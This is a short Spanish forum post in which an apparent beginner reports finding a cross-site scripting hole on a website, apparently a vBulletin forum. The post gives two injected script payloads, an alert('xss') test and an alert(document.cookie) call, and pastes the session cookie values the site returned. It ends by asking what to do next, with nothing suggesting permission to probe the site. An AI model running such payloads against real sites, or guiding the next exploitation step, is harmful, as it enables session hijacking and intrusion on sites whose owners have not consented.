Soy nuevo en esto, ya tengo el "Exploit" (con mucho esfuerzo pero lo saque (6).
Pero nunca habia usado esta tecnica .. resulta que tipeo el exploit en el navegador
Código:
<script>alert('xss');</script>
y me tira que es vulnerable (hay todo bien) pero tipeo la misma variable usando
Código:
<script>alert(document.cookie);</script>
y me lanza : bb_lastvisit=1280885146; bb_lastactivity=0; bb_calendar=79b5df1ff66172db9c2307ecc40f2ee6c1d00799a-3-%7Bs-7-.calyear._i-2010_s-8-.calmonth._i-8_s-8-.calview1._s-12-.displaymonth._%7D
Ahora que hago jajaja